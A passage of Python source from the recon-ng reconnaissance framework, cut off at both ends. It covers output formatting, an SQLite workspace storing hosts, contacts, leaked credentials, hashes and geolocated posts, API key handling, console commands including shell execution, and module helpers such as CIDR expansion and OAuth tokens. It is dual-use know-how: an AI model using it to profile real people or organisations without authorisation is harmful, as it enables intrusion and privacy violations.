'type': 'SHA256'}, {'pattern': '^[a-fA-F0-9]{96}$', 'type': 'SHA384'}, {'pattern': '^[a-fA-F0-9]{128}$', 'type': 'SHA512'}, {'pattern': '^\$[PH]{1}\$.{31}$', 'type': 'phpass'}, {'pattern': '^\$2[ya]?\$.{56}$', 'type': 'bcrypt'}, ] for hashitem in hashdict: if re.match(hashitem['pattern'], hashstr): return hashitem['type'] return False def get_random_str(self, length): return ''.join(random.choice(string.lowercase) for i in range(length)) def _is_writeable(self, filename): try: fp = open(filename, 'a') fp.close() return True except IOError: return False def _parse_rowids(self, rowids): xploded = [] rowids = [x.strip() for x in rowids.split(',')] for rowid in rowids: try: if '-' in rowid: start = int(rowid.split('-')[0].strip()) end = int(rowid.split('-')[-1].strip()) xploded += range(start, end+1) else: xploded.append(int(rowid)) except ValueError: continue return sorted(list(set(xploded))) #================================================== # OUTPUT METHODS #================================================== def print_exception(self, line=''): stack_list = [x.strip() for x in traceback.format_exc().strip().splitlines()] line = ' '.join([x for x in [stack_list[-1], line] if x]) if self._global_options['verbosity'] == 1: if len(stack_list) > 3: line = os.linesep.join((stack_list[-1], stack_list[-3])) elif self._global_options['verbosity'] == 2: print('%s%s' % (Colors.R, '-'*60)) traceback.print_exc() print('%s%s' % ('-'*60, Colors.N)) self.error(line) def error(self, line): '''Formats and presents errors.''' if not re.search('[.,;!?]$', line): line += '.' line = line[:1].upper() + line[1:] print('%s[!] %s%s' % (Colors.R, self.to_unicode(line), Colors.N)) def output(self, line): '''Formats and presents normal output.''' print('%s[*]%s %s' % (Colors.B, Colors.N, self.to_unicode(line))) def alert(self, line): '''Formats and presents important output.''' print('%s[*]%s %s' % (Colors.G, Colors.N, self.to_unicode(line))) def verbose(self, line): '''Formats and presents output if in verbose mode.''' if self._global_options['verbosity'] >= 1: self.output(line) def debug(self, line): '''Formats and presents output if in debug mode (very verbose).''' if self._global_options['verbosity'] >= 2: self.output(line) def heading(self, line, level=1): '''Formats and presents styled header text''' line = self.to_unicode(line) print('') if level == 0: print(self.ruler*len(line)) print(line.upper()) print(self.ruler*len(line)) if level == 1: print('%s%s' % (self.spacer, line.title())) print('%s%s' % (self.spacer, self.ruler*len(line))) def table(self, data, header=[], title=''): '''Accepts a list of rows and outputs a table.''' tdata = list(data) if header: tdata.insert(0, header) if len(set([len(x) for x in tdata])) > 1: raise FrameworkException('Row lengths not consistent.') lens = [] cols = len(tdata[0]) # create a list of max widths for each column for i in range(0,cols): lens.append(len(max([self.to_unicode_str(x[i]) if x[i] != None else '' for x in tdata], key=len))) # calculate dynamic widths based on the title title_len = len(title) tdata_len = sum(lens) + (3*(cols-1)) diff = title_len - tdata_len if diff > 0: diff_per = diff / cols lens = [x+diff_per for x in lens] diff_mod = diff % cols for x in range(0, diff_mod): lens[x] += 1 # build ascii table if len(tdata) > 0: separator_str = '%s+-%s%%s-+' % (self.spacer, '%s---'*(cols-1)) separator_sub = tuple(['-'*x for x in lens]) separator = separator_str % separator_sub data_str = '%s| %s%%s |' % (self.spacer, '%s | '*(cols-1)) # top of ascii table print('') print(separator) # ascii table data if title: print('%s| %s |' % (self.spacer, title.center(tdata_len))) print(separator) if header: rdata = tdata.pop(0) data_sub = tuple([rdata[i].center(lens[i]) for i in range(0,cols)]) print(data_str % data_sub) print(separator) for rdata in tdata: data_sub = tuple([self.to_unicode_str(rdata[i]).ljust(lens[i]) if rdata[i] != None else ''.ljust(lens[i]) for i in range(0,cols)]) print(data_str % data_sub) # bottom of ascii table print(separator) print('') #================================================== # DATABASE METHODS #================================================== def query(self, query, values=(), path=''): '''Queries the database and returns the results as a list.''' if not path: path = os.path.join(self.workspace, 'data.db') self.debug('DATABASE => %s' % (path)) self.debug('QUERY => %s' % (query)) with sqlite3.connect(path) as conn: # coerce all text to bytes (str) for internal processing conn.text_factory = bytes with closing(conn.cursor()) as cur: if values: self.debug('VALUES => %s' % (repr(values))) cur.execute(query, values) else: cur.execute(query) # a rowcount of -1 typically refers to a select statement if cur.rowcount == -1: rows = cur.fetchall() results = rows # a rowcount of 1 == success and 0 == failure else: conn.commit() results = cur.rowcount return results def get_columns(self, table): return [(x[1],x[2]) for x in self.query('PRAGMA table_info(\'%s\')' % (table))] def get_tables(self): return [x[0] for x in self.query('SELECT name FROM sqlite_master WHERE type=\'table\'') if x[0] not in ['dashboard']] #================================================== # ADD METHODS #================================================== def _display(self, data, rowcount, pattern=None, keys=None): display = self.alert if rowcount else self.verbose if pattern and keys: values = tuple([data[key] or '<blank>' for key in keys]) display(pattern % values) else: for key in sorted(data.keys()): display('%s: %s' % (key.title(), data[key])) display(self.ruler*50) def add_domains(self, domain=None, mute=False): '''Adds a domain to the database and returns the affected row count.''' data = dict( domain = domain ) rowcount = self.insert('domains', data.copy(), data.keys()) if not mute: self._display(data, rowcount, '[domain] %s', data.keys()) return rowcount def add_companies(self, company=None, description=None, mute=False): '''Adds a company to the database and returns the affected row count.''' data = dict( company = company, description = description ) rowcount = self.insert('companies', data.copy(), ('company',)) if not mute: self._display(data, rowcount, '[company] %s - %s', data.keys()) return rowcount def add_netblocks(self, netblock=None, mute=False): '''Adds a netblock to the database and returns the affected row count.''' data = dict( netblock = netblock ) rowcount = self.insert('netblocks', data.copy(), data.keys()) if not mute: self._display(data, rowcount, '[netblock] %s', data.keys()) return rowcount def add_locations(self, latitude=None, longitude=None, street_address=None, mute=False): '''Adds a location to the database and returns the affected row count.''' data = dict( latitude = latitude, longitude = longitude, street_address = street_address ) rowcount = self.insert('locations', data.copy(), data.keys()) if not mute: self._display(data, rowcount, '[location] %s, %s - %s', data.keys()) return rowcount def add_vulnerabilities(self, host=None, reference=None, example=None, publish_date=None, category=None, status=None, mute=False): '''Adds a vulnerability to the database and returns the affected row count.''' data = dict( host = host, reference = reference, example = example, publish_date = publish_date.strftime(self.time_format) if publish_date else None, category = category, status = status ) rowcount = self.insert('vulnerabilities', data.copy(), data.keys()) if not mute: self._display(data, rowcount) return rowcount def add_ports(self, ip_address=None, host=None, port=None, protocol=None, mute=False): '''Adds a port to the database and returns the affected row count.''' data = dict( ip_address = ip_address, port = port, host = host, protocol = protocol ) rowcount = self.insert('ports', data.copy(), ('ip_address', 'port', 'host')) if not mute: self._display(data, rowcount, '[port] %s (%s/%s) - %s', ('ip_address', 'port', 'protocol', 'host')) return rowcount def add_hosts(self, host=None, ip_address=None, region=None, country=None, latitude=None, longitude=None, mute=False): '''Adds a host to the database and returns the affected row count.''' data = dict( host = host, ip_address = ip_address, region = region, country = country, latitude = latitude, longitude = longitude ) rowcount = self.insert('hosts', data.copy(), ('host', 'ip_address')) if not mute: self._display(data, rowcount, '[host] %s (%s)', ('host', 'ip_address')) return rowcount def add_contacts(self, first_name=None, middle_name=None, last_name=None, email=None, title=None, region=None, country=None, mute=False): '''Adds a contact to the database and returns the affected row count.''' data = dict( first_name = first_name, middle_name = middle_name, last_name = last_name, title = title, email = email, region = region, country = country ) rowcount = self.insert('contacts', data.copy(), ('first_name', 'middle_name', 'last_name', 'title', 'email')) if not mute: self._display(data, rowcount, '[contact] %s %s (%s) - %s', ('first_name', 'last_name', 'email', 'title')) return rowcount def add_credentials(self, username=None, password=None, _hash=None, _type=None, leak=None, mute=False): '''Adds a credential to the database and returns the affected row count.''' data = dict ( username = username, password = password, hash = _hash, type = _type, leak = leak ) if password and not _hash: hash_type = self.is_hash(password) if hash_type: data['hash'] = password data['type'] = hash_type data['password'] = None # add email usernames to contacts if username is not None and '@' in username: self.add_contacts(first_name=None, last_name=None, title=None, email=username) rowcount = self.insert('credentials', data.copy(), data.keys()) if not mute: self._display(data, rowcount, '[credential] %s: %s', ('username', 'password')) return rowcount def add_leaks(self, leak_id=None, description=None, source_refs=None, leak_type=None, title=None, import_date=None, leak_date=None, attackers=None, num_entries=None, score=None, num_domains_affected=None, attack_method=None, target_industries=None, password_hash=None, password_type=None, targets=None, media_refs=None, mute=False): '''Adds a leak to the database and returns the affected row count.''' data = dict( leak_id = leak_id, description = description, source_refs = source_refs, leak_type = leak_type, title = title, import_date = import_date, leak_date = leak_date, attackers = attackers, num_entries = num_entries, score = score, num_domains_affected = num_domains_affected, attack_method = attack_method, target_industries = target_industries, password_hash = password_hash, password_type = password_type, targets = targets, media_refs = media_refs ) rowcount = self.insert('leaks', data.copy(), data.keys()) if not mute: self._display(data, rowcount) return rowcount def add_pushpins(self, source=None, screen_name=None, profile_name=None, profile_url=None, media_url=None, thumb_url=None, message=None, latitude=None, longitude=None, time=None, mute=False): '''Adds a pushpin to the database and returns the affected row count.''' data = dict( source = source, screen_name = screen_name, profile_name = profile_name, profile_url = profile_url, media_url = media_url, thumb_url = thumb_url, message = message, latitude = latitude, longitude = longitude, time = time.strftime(self.time_format) ) rowcount = self.insert('pushpins', data.copy(), data.keys()) if not mute: self._display(data, rowcount) return rowcount def add_profiles(self, username=None, resource=None, url=None, category=None, notes=None, mute=False): '''Adds a profile to the database and returns the affected row count.''' data = dict( username = username, resource = resource, url = url, category = category, notes = notes ) rowcount = self.insert('profiles', data.copy(), ('username', 'url')) if not mute: self._display(data, rowcount, '[profile] %s - %s (%s)', ('username', 'resource', 'url')) return rowcount def add_repositories(self, name=None, owner=None, description=None, resource=None, category=None, url=None, mute=False): '''Adds a repository to the database and returns the affected row count.''' data = dict( name = name, owner = owner, description = description, resource = resource, category = category, url = url ) rowcount = self.insert('repositories', data.copy(), data.keys()) if not mute: self._display(data, rowcount, '[repository] %s - %s', ('name', 'description')) return rowcount def insert(self, table, data, unique_columns=[]): '''Inserts items into database and returns the affected row count. table - the table to insert the data into data - the information to insert into the database table in the form of a dictionary where the keys are the column names and the values are the column values unique_columns - a list of column names that should be used to determine if the information being inserted is unique''' # set module to the calling module unless the do_add command was used data['module'] = 'user_defined' if 'do_add' in [x[3] for x in inspect.stack()] else self._modulename.split('/')[-1] # sanitize the inputs to remove NoneTypes, blank strings, and zeros columns = [x for x in data.keys() if data[x]] # make sure that module is not seen as a unique column unique_columns = [x for x in unique_columns if x in columns and x != 'module'] # exit if there is nothing left to insert if not columns: return 0 # convert all bytes (str) to unicode for external processing for column in columns: data[column] = self.to_unicode(data[column]) if not unique_columns: query = u'INSERT INTO "%s" ("%s") VALUES (%s)' % ( table, '", "'.join(columns), ', '.join('?'*len(columns)) ) else: query = u'INSERT INTO "%s" ("%s") SELECT %s WHERE NOT EXISTS(SELECT * FROM "%s" WHERE %s)' % ( table, '", "'.join(columns), ', '.join('?'*len(columns)), table, ' and '.join(['"%s"=?' % (column) for column in unique_columns]) ) values = tuple([data[column] for column in columns] + [data[column] for column in unique_columns]) rowcount = self.query(query, values) # increment summary tracker if table not in self._summary_counts: self._summary_counts[table] = [0,0] self._summary_counts[table][0] += rowcount self._summary_counts[table][1] += 1 # build RPC response for key in data.keys(): if not data[key]: del data[key] self.rpc_cache.append(data) return rowcount #================================================== # OPTIONS METHODS #================================================== def register_option(self, name, value, required, description): self.options.init_option(name=name.lower(), value=value, required=required, description=description) # needs to be optimized rather than ran on every register self._load_config() def _validate_options(self): for option in self.options: # if value type is bool or int, then we know the options is set if not type(self.options[option]) in [bool, int]: if self.options.required[option] is True and not self.options[option]: raise FrameworkException('Value required for the \'%s\' option.' % (option.upper())) return def _load_config(self): config_path = os.path.join(self.workspace, 'config.dat') # don't bother loading if a config file doesn't exist if os.path.exists(config_path): # retrieve saved config data with open(config_path) as config_file: try: config_data = json.loads(config_file.read()) except ValueError: # file is corrupt, nothing to load, exit gracefully pass else: # set option values for key in self.options: try: self.options[key] = config_data[self._modulename][key] except KeyError: # invalid key, contnue to load valid keys continue def _save_config(self, name): config_path = os.path.join(self.workspace, 'config.dat') # create a config file if one doesn't exist open(config_path, 'a').close() # retrieve saved config data with open(config_path) as config_file: try: config_data = json.loads(config_file.read()) except ValueError: # file is empty or corrupt, nothing to load config_data = {} # create a container for the current module if self._modulename not in config_data: config_data[self._modulename] = {} # set the new option value in the config config_data[self._modulename][name] = self.options[name] # remove the option if it has been unset if config_data[self._modulename][name] is None: del config_data[self._modulename][name] # remove the module container if it is empty if not config_data[self._modulename]: del config_data[self._modulename] # write the new config data to the config file with open(config_path, 'w') as config_file: json.dump(config_data, config_file, indent=4) #================================================== # API KEY METHODS #================================================== def get_key(self, name): rows = self._query_keys('SELECT value FROM keys WHERE name=? AND value NOT NULL', (name,)) if not rows: return None return rows[0][0] def add_key(self, name, value): result = self._query_keys('UPDATE keys SET value=? WHERE name=?', (value, name)) if not result: return self._query_keys('INSERT INTO keys VALUES (?, ?)', (name, value)) return result def delete_key(self, name): #return self._query_keys('UPDATE keys SET value=NULL WHERE name=?', (name,)) return self._query_keys('DELETE FROM keys WHERE name=?', (name,)) def _query_keys(self, query, values=()): path = os.path.join(self._home, 'keys.db') result = self.query(query, values, path) # filter out tokens when not called from the get_key method if type(result) is list and 'get_key' not in [x[3] for x in inspect.stack()]: result = [x for x in result if not x[0].endswith('_token')] return result def _list_keys(self): keys = self._query_keys('SELECT * FROM keys') tdata = [] for key in sorted(keys): tdata.append(key) if tdata: self.table(tdata, header=['Name', 'Value']) #================================================== # REQUEST METHODS #================================================== def request(self, url, method='GET', timeout=None, payload=None, headers=None, cookiejar=None, auth=None, content='', redirect=True, agent=None): request = Request() request.user_agent = agent or self._global_options['user-agent'] request.debug = True if self._global_options['verbosity'] >= 2 else False request.proxy = self._global_options['proxy'] request.timeout = timeout or self._global_options['timeout'] request.redirect = redirect return request.send(url, method=method, payload=payload, headers=headers, cookiejar=cookiejar, auth=auth, content=content) #================================================== # SHOW METHODS #================================================== def show_modules(self, param): # process parameter according to type if type(param) is list: modules = param elif param: modules = [x for x in Framework._loaded_modules if x.startswith(param)] if not modules: self.error('Invalid module category.') return else: modules = Framework._loaded_modules # display the modules key_len = len(max(modules, key=len)) + len(self.spacer) last_category = '' for module in sorted(modules): category = module.split('/')[0] if category != last_category: # print header last_category = category self.heading(last_category) # print module print('%s%s' % (self.spacer*2, module)) print('') def show_dashboard(self): rows = self.query('SELECT * FROM dashboard ORDER BY 1') if rows: # display activity table tdata = [] for row in rows: tdata.append(row) self.table(tdata, header=['Module', 'Runs'], title='Activity Summary') # display summary results table tables = self.get_tables() tdata = [] for table in tables: count = self.query('SELECT COUNT(*) FROM "%s"' % (table))[0][0] tdata.append([table.title(), count]) self.table(tdata, header=['Category', 'Quantity'], title='Results Summary') else: self.output('This workspace has no record of activity.') def show_schema(self): '''Displays the database schema''' tables = self.get_tables() for table in tables: columns = self.get_columns(table) self.table(columns, title=table) def show_options(self, options=None): '''Lists options''' if options is None: options = self.options if options: pattern = '%s%%s %%s %%s %%s' % (self.spacer) key_len = len(max(options, key=len)) if key_len < 4: key_len = 4 val_len = len(max([self.to_unicode_str(options[x]) for x in options], key=len)) if val_len < 13: val_len = 13 print('') print(pattern % ('Name'.ljust(key_len), 'Current Value'.ljust(val_len), 'Required', 'Description')) print(pattern % (self.ruler*key_len, (self.ruler*13).ljust(val_len), self.ruler*8, self.ruler*11)) for key in sorted(options): value = options[key] if options[key] != None else '' reqd = 'no' if options.required[key] is False else 'yes' desc = options.description[key] print(pattern % (key.upper().ljust(key_len), self.to_unicode_str(value).ljust(val_len), self.to_unicode_str(reqd).ljust(8), desc)) print('') else: print('') print('%sNo options available for this module.' % (self.spacer)) print('') def show_keys(self): self.do_keys('list') def _get_show_names(self): # Any method beginning with "show_" will be parsed # and added as a subcommand for the show command. prefix = 'show_' return [x[len(prefix):] for x in self.get_names() if x.startswith(prefix)] #================================================== # COMMAND METHODS #================================================== def do_exit(self, params): '''Exits the framework''' self._exit = 1 return True # alias for exit def do_back(self, params): '''Exits the current context''' return True def do_set(self, params): '''Sets module options''' options = params.split() if len(options) < 2: self.help_set() return name = options[0].lower() if name in self.options: value = ' '.join(options[1:]) self.options[name] = value print('%s => %s' % (name.upper(), value)) self._save_config(name) else: self.error('Invalid option.') def do_unset(self, params): '''Unsets module options''' self.do_set('%s %s' % (params, 'None')) def do_keys(self, params): '''Manages framework API keys''' if not params: self.help_keys() return params = params.split() arg = params.pop(0).lower() if arg == 'list': self._list_keys() elif arg == 'add': if len(params) == 2: if self.add_key(params[0], params[1]): self.output('Key \'%s\' added.' % (params[0])) else: print('\nUsage: keys add <name> <value>\n') elif arg == 'delete': if len(params) == 1: if self.delete_key(params[0]): self.output('Key \'%s\' deleted.' % (params[0])) else: print('\nUsage: keys delete <name>\n') else: self.help_keys() def do_query(self, params): '''Queries the database''' if not params: self.help_query() return with sqlite3.connect(os.path.join(self.workspace, 'data.db')) as conn: conn.text_factory = bytes with closing(conn.cursor()) as cur: self.debug('QUERY => %s' % (params)) try: cur.execute(params) except sqlite3.OperationalError as e: self.error('Invalid query. %s %s' % (type(e).__name__, e.message)) return if cur.rowcount == -1 and cur.description: tdata = cur.fetchall() if not tdata: self.output('No data returned.') else: header = tuple([x[0] for x in cur.description]) self.table(tdata, header=header) self.output('%d rows returned' % (len(tdata))) else: conn.commit() self.output('%d rows affected.' % (cur.rowcount)) def do_show(self, params): '''Shows various framework items''' if not params: self.help_show() return _params = params params = params.lower().split() arg = params[0] params = ' '.join(params[1:]) if arg in self._get_show_names(): func = getattr(self, 'show_' + arg) if arg == 'modules': func(params) else: func() elif _params in self.get_tables(): self.do_query('SELECT ROWID, * FROM "%s"' % (_params)) else: self.help_show() def do_add(self, params): '''Adds records to the database''' table = '' # search params for table names for table_name in self.get_tables(): if params.startswith(table_name): params = params[len(table_name)+1:] table = table_name break if table: # validate add_* method for table if not hasattr(self, 'add_' + table): self.error('Cannot add records to dynamicly created tables.') return columns = [x for x in self.get_columns(table) if x[0] != 'module'] # sanitize column names to avoid conflicts with builtins in add_* method sanitize_column = lambda x: '_'+x if x in ['hash', 'type'] else x record = {} # build record from parameters if params: # parse params into values by delim values = params.split('~') # validate parsed value input if len(columns) == len(values): # assign each value to a column for i in range(0,len(columns)): record[sanitize_column(columns[i][0])] = values[i] else: self.error('Columns and values length mismatch.') return # build record from interactive input else: for column in columns: try: # prompt user for data value = raw_input('%s (%s): ' % column) record[sanitize_column(column[0])] = value except KeyboardInterrupt: print('') return finally: # ensure proper output for resource scripts if Framework._script: print('%s' % (value)) # add record to the database func = getattr(self, 'add_' + table) record['mute'] = True func(**record) else: self.help_add() def do_delete(self, params): '''Deletes records from the database''' table = '' # search params for table names for table_name in self.get_tables(): if params.startswith(table_name): params = params[len(table_name)+1:] table = table_name break if table: # get rowid from parameters if params: rowids = self._parse_rowids(params) # get rowid from interactive input else: try: # prompt user for data params = raw_input('rowid(s) (INT): ') rowids = self._parse_rowids(params) except KeyboardInterrupt: print('') return finally: # ensure proper output for resource scripts if Framework._script: print('%s' % (params)) # delete record(s) from the database for rowid in rowids: self.query('DELETE FROM %s WHERE ROWID IS ?' % (table), (rowid,)) else: self.help_delete() def do_search(self, params): '''Searches available modules''' if not params: self.help_search() return text = params.split()[0] self.output('Searching for \'%s\'...' % (text)) modules = [x for x in Framework._loaded_modules if text in x] if not modules: self.error('No modules found containing \'%s\'.' % (text)) else: self.show_modules(modules) def do_record(self, params): '''Records commands to a resource file''' if not params: self.help_record() return arg = params.lower() if arg.split()[0] == 'start': if not Framework._record: if len(arg.split()) > 1: filename = ' '.join(arg.split()[1:]) if not self._is_writeable(filename): self.output('Cannot record commands to \'%s\'.' % (filename)) else: Framework._record = filename self.output('Recording commands to \'%s\'.' % (Framework._record)) else: self.help_record() else: self.output('Recording is already started.') elif arg == 'stop': if Framework._record: self.output('Recording stopped. Commands saved to \'%s\'.' % (Framework._record)) Framework._record = None else: self.output('Recording is already stopped.') elif arg == 'status': status = 'started' if Framework._record else 'stopped' self.output('Command recording is %s.' % (status)) else: self.help_record() def do_spool(self, params): '''Spools output to a file''' if not params: self.help_spool() return arg = params.lower() if arg.split()[0] == 'start': if not Framework._spool: if len(arg.split()) > 1: filename = ' '.join(arg.split()[1:]) if not self._is_writeable(filename): self.output('Cannot spool output to \'%s\'.' % (filename)) else: Framework._spool = codecs.open(filename, 'ab', encoding='utf-8') self.output('Spooling output to \'%s\'.' % (Framework._spool.name)) else: self.help_spool() else: self.output('Spooling is already started.') elif arg == 'stop': if Framework._spool: self.output('Spooling stopped. Output saved to \'%s\'.' % (Framework._spool.name)) Framework._spool = None else: self.output('Spooling is already stopped.') elif arg == 'status': status = 'started' if Framework._spool else 'stopped' self.output('Output spooling is %s.' % (status)) else: self.help_spool() def do_shell(self, params): '''Executes shell commands''' proc = subprocess.Popen(params, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.output('Command: %s' % (params)) stdout = proc.stdout.read() stderr = proc.stderr.read() if stdout: print('%s%s%s' % (Colors.O, stdout, Colors.N), end='') if stderr: print('%s%s%s' % (Colors.R, stderr, Colors.N), end='') def do_resource(self, params): '''Executes commands from a resource file''' if not params: self.help_resource() return if os.path.exists(params): sys.stdin = open(params) Framework._script = 1 else: self.error('Script file \'%s\' not found.' % (params)) def do_load(self, params): '''Loads selected module''' if not params: self.help_load() return # finds any modules that contain params modules = [params] if params in Framework._loaded_modules else [x for x in Framework._loaded_modules if params in x] # notify the user if none or multiple modules are found if len(modules) != 1: if not modules: self.error('Invalid module name.') else: self.output('Multiple modules match \'%s\'.' % params) self.show_modules(modules) return import StringIO # compensation for stdin being used for scripting and loading if Framework._script: end_string = sys.stdin.read() else: end_string = 'EOF' Framework._load = 1 sys.stdin = StringIO.StringIO('load %s\n%s' % (modules[0], end_string)) return True do_use = do_load def do_pdb(self, params): '''Starts a Python Debugger session''' import pdb pdb.set_trace() #================================================== # HELP METHODS #================================================== def help_keys(self): print(getattr(self, 'do_keys').__doc__) print('') print('Usage: keys [list|add|delete]') print('') def help_load(self): print(getattr(self, 'do_load').__doc__) print('') print('Usage: [load|use] <module>') print('') help_use = help_load def help_record(self): print(getattr(self, 'do_record').__doc__) print('') print('Usage: record [start <filename>|stop|status]') print('') def help_spool(self): print(getattr(self, 'do_spool').__doc__) print('') print('Usage: spool [start <filename>|stop|status]') print('') def help_resource(self): print(getattr(self, 'do_resource').__doc__) print('') print('Usage: resource <filename>') print('') def help_query(self): print(getattr(self, 'do_query').__doc__) print('') print('Usage: query <sql>') print('') print('SQL examples:') print('%s%s' % (self.spacer, 'SELECT columns|* FROM table_name')) print('%s%s' % (self.spacer, 'SELECT columns|* FROM table_name WHERE some_column=some_value')) print('%s%s' % (self.spacer, 'DELETE FROM table_name WHERE some_column=some_value')) print('%s%s' % (self.spacer, 'INSERT INTO table_name (column1, column2,...) VALUES (value1, value2,...)')) print('%s%s' % (self.spacer, 'UPDATE table_name SET column1=value1, column2=value2,... WHERE some_column=some_value')) print('') def help_search(self): print(getattr(self, 'do_search').__doc__) print('') print('Usage: search <string>') print('') def help_set(self): print(getattr(self, 'do_set').__doc__) print('') print('Usage: set <option> <value>') self.show_options() def help_unset(self): print(getattr(self, 'do_unset').__doc__) print('') print('Usage: unset <option>') self.show_options() def help_shell(self): print(getattr(self, 'do_shell').__doc__) print('') print('Usage: [shell|!] <command>') print('...or just type a command at the prompt.') print('') def help_show(self): options = sorted(self._get_show_names() + self.get_tables()) print(getattr(self, 'do_show').__doc__) print('') print('Usage: show [%s]' % ('|'.join(options))) print('') def help_add(self): print(getattr(self, 'do_add').__doc__) print('') print('Usage: add <table> [values]') print('') print('optional arguments:') print('%svalues => \'~\' delimited string representing column values (exclude rowid, module)' % (self.spacer)) print('') def help_delete(self): print(getattr(self, 'do_delete').__doc__) print('') print('Usage: delete <table> [rowid(s)]') print('') print('optional arguments:') print('%srowid(s) => \',\' delimited values or \'-\' delimited ranges representing rowids' % (self.spacer)) print('') #================================================== # COMPLETE METHODS #================================================== def complete_keys(self, text, line, *ignored): args = line.split() options = ['list', 'add', 'delete'] if 1 < len(args) < 4: if args[1].lower() in options[1:]: return [x[0] for x in self._query_keys('SELECT name FROM keys') if x[0].startswith(text)] if args[1].lower() in options[:1]: return [] return [x for x in options if x.startswith(text)] def complete_load(self, text, *ignored): return [x for x in Framework._loaded_modules if x.startswith(text)] complete_use = complete_load def complete_record(self, text, *ignored): return [x for x in ['start', 'stop', 'status'] if x.startswith(text)] complete_spool = complete_record def complete_set(self, text, *ignored): return [x.upper() for x in self.options if x.upper().startswith(text.upper())] complete_unset = complete_set def complete_show(self, text, line, *ignored): args = line.split() if len(args) > 1 and args[1].lower() == 'modules': if len(args) > 2: return [x for x in Framework._loaded_modules if x.startswith(args[2])] else: return [x for x in Framework._loaded_modules] options = sorted(self._get_show_names() + self.get_tables()) return [x for x in options if x.startswith(text)] def complete_add(self, text, *ignored): tables = sorted(self.get_tables()) return [x for x in tables if x.startswith(text)] complete_delete = complete_add ����������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon/core/module.py����������������������������������������������0000664�0000000�0000000�00000056424�13122657244�0022064�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from __future__ import print_function import cookielib import hashlib import hmac import HTMLParser import os import re import socket import sqlite3 import struct import sys import textwrap import time import urllib import urlparse # framework libs from recon.core import framework #================================================= # MODULE CLASS #================================================= class BaseModule(framework.Framework): def __init__(self, params, query=None): framework.Framework.__init__(self, params) self.options = framework.Options() # register a data source option if a default query is specified in the module if self.meta.get('query'): self._default_source = self.meta.get('query') self.register_option('source', 'default', True, 'source of input (see \'show info\' for details)') # register all other specified options if self.meta.get('options'): for option in self.meta.get('options'): self.register_option(*option) # register any required keys if self.meta.get('required_keys'): self.keys = {} for key in self.meta.get('required_keys'): # add key to the database self._query_keys('INSERT OR IGNORE INTO keys (name) VALUES (?)', (key,)) # migrate the old key if needed self._migrate_key(key) # add key to local keys dictionary # could fail to load on exception here to prevent loading modules # without required keys, but would need to do it in a separate loop # so that all keys get added to the database first. for now, the # framework will warn users of the missing key, but allow the module # to load. self.keys[key] = self.get_key(key) if not self.keys.get(key): self.error('\'%s\' key not set. %s module will likely fail at runtime. See \'keys add\'.' % (key, self._modulename.split('/')[-1])) self._reload = 0 #================================================== # SUPPORT METHODS #================================================== def _migrate_key(self, key): '''migrate key from old .dat file''' key_path = os.path.join(self._home, 'keys.dat') if os.path.exists(key_path): try: key_data = json.loads(open(key_path, 'rb').read()) if key_data.get(key): self.add_key(key, key_data.get(key)) except: self.error('Corrupt key file. Manual migration of \'%s\' required.' % (key)) def ascii_sanitize(self, s): return ''.join([char for char in s if ord(char) in [10,13] + range(32, 126)]) def html_unescape(self, s): '''Unescapes HTML markup and returns an unescaped string.''' h = HTMLParser.HTMLParser() return h.unescape(s) #p = htmllib.HTMLParser(None) #p.save_bgn() #p.feed(s) #return p.save_end() def html_escape(self, s): escapes = { '&': '&', '"': '"', "'": ''', '>': '>', '<': '<', } return ''.join(escapes.get(c,c) for c in s) def cidr_to_list(self, string): # references: # http://boubakr92.wordpress.com/2012/12/20/convert-cidr-into-ip-range-with-python/ # http://stackoverflow.com/questions/8338655/how-to-get-list-of-ip-addresses # parse address and cidr (addrString, cidrString) = string.split('/') # split address into octets and convert cidr to int addr = addrString.split('.') cidr = int(cidrString) # initialize the netmask and calculate based on cidr mask mask = [0, 0, 0, 0] for i in range(cidr): mask[i/8] = mask[i/8] + (1 << (7 - i % 8)) # initialize net and binary and netmask with addr to get network net = [] for i in range(4): net.append(int(addr[i]) & mask[i]) # duplicate net into broad array, gather host bits, and generate broadcast broad = list(net) brange = 32 - cidr for i in range(brange): broad[3 - i/8] = broad[3 - i/8] + (1 << (i % 8)) # print information, mapping integer lists to strings for easy printing #mask = '.'.join(map(str, mask)) net = '.'.join(map(str, net)) broad = '.'.join(map(str, broad)) ips = [] f = struct.unpack('!I',socket.inet_pton(socket.AF_INET,net))[0] l = struct.unpack('!I',socket.inet_pton(socket.AF_INET,broad))[0] while f <= l: ips.append(socket.inet_ntop(socket.AF_INET,struct.pack('!I',f))) f = f + 1 return ips def parse_name(self, name): elements = [self.html_unescape(x) for x in name.strip().split()] # remove prefixes and suffixes names = [] for i in range(0,len(elements)): # preserve initials if re.search(r'^\w\.$', elements[i]): elements[i] = elements[i][:-1] # remove unecessary prefixes and suffixes elif re.search(r'(?:\.|^the$|^jr$|^sr$|^I{2,3}$)', elements[i], re.IGNORECASE): continue names.append(elements[i]) # make sense of the remaining elements if len(names) > 3: names[2:] = [' '.join(names[2:])] # clean up any remaining garbage characters names = [re.sub(r"[,']", '', x) for x in names] # set values and return names fname = names[0] if len(names) >= 1 else None mname = names[1] if len(names) >= 3 else None lname = names[-1] if len(names) >= 2 else None return fname, mname, lname def hosts_to_domains(self, hosts, exclusions=[]): domains = [] for host in hosts: elements = host.split('.') # recursively walk through the elements # extracting all possible (sub)domains while len(elements) >= 2: # account for domains stored as hosts if len(elements) == 2: domain = '.'.join(elements) else: # drop the host element domain = '.'.join(elements[1:]) if domain not in domains + exclusions: domains.append(domain) del elements[0] return domains #================================================== # OPTIONS METHODS #================================================== def _get_source(self, params, query=None): prefix = params.split()[0].lower() if prefix in ['query', 'default']: query = ' '.join(params.split()[1:]) if prefix == 'query' else query try: results = self.query(query) except sqlite3.OperationalError as e: raise framework.FrameworkException('Invalid source query. %s %s' % (type(e).__name__, e.message)) if not results: sources = [] elif len(results[0]) > 1: sources = [x[:len(x)] for x in results] #raise framework.FrameworkException('Too many columns of data as source input.') else: sources = [x[0] for x in results] elif os.path.exists(params): sources = open(params).read().split() else: sources = [params] if not sources: raise framework.FrameworkException('Source contains no input.') return sources #================================================== # 3RD PARTY API METHODS #================================================== def get_explicit_oauth_token(self, resource, scope, authorize_url, access_url): token_name = resource+'_token' token = self.get_key(token_name) if token: return token import urllib import webbrowser import socket client_id = self.get_key(resource+'_api') client_secret = self.get_key(resource+'_secret') port = 31337 redirect_uri = 